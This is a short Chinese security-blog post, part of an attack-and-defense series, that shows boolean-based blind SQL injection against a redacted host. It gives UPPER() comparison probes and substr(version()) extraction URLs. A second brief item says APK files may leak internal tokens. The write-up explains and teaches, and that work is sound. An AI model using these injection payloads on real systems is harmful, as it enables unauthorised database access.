安全娱乐圈之攻防技术交流系列文章 第6弹

admin 2021年4月18日11:33:09评论42 views字数 837阅读2分47秒阅读模式


安全娱乐圈之攻防技术交流系列文章 第6弹


1


在一次测试中,发现存在SQL盲注的 URI 为:


http://xxx.xxx.xxx.xxx/item/default %INJECTIONPOINTHERE%


首先访问


http://xxx.xxx.xxx.xxx/item/default'and%20UPPER('asd')='asd'--


页面返回 404


继续访问


http://xxx.xxx.xxx.xxx/item/default'and%20UPPER('asd')='ASD'--


页面返回 200


继续盲注


http://xxx.xxx.xxx.xxx/item/default'and%20substr(version(),1,1)='2'-- ==> will give you 200 OK
http://xxx.xxx.xxx.xxx/item/default'and%20substr(version(),2,1)='0'-- ==> will give you 200 OK


如果在用户可控制的输入中没有进行充分的过滤,则生成的SQL查询可能导致用户输入被解释为SQL而不是普通用户数据。这可用于更改查询逻辑以绕过安全检查,或用于插入修改后端数据库的其他语句,甚至有可能执行系统命令。


2


在一些apk文件中,有可能获取到内部令牌,从而有可能进一步获取敏感信息。


星光不问赶路人,岁月不负有心人!

安全娱乐圈之攻防技术交流系列文章 第6弹

    加油,网安人!


“攻防技术交流”这一个系列的文章

主要记录日常实战与学习交流的

攻防思路与心得体会

如果你有新奇的攻防idea

非常欢迎与小伙伴们一起分享交流

VX群暗号

后台回复“ 技术交流 ”获取

入群须知:

纯技术交流群禁止灌水

长期潜水不分享交流的会进行清理

希望大家予以理解


安全娱乐圈之攻防技术交流系列文章 第6弹

● 安全娱乐圈之攻防技术交流系列文章 第1弹

● 安全娱乐圈之攻防技术交流系列文章 第2弹

● 安全娱乐圈之攻防技术交流系列文章 第3弹

● 安全娱乐圈之攻防技术交流系列文章 第4弹

● 安全娱乐圈之攻防技术交流系列文章 第5弹

本文始发于微信公众号(西子实验室):安全娱乐圈之攻防技术交流系列文章 第6弹

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月18日11:33:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安全娱乐圈之攻防技术交流系列文章 第6弹https://cn-sec.com/archives/337927.html

发表评论

匿名网友 填写信息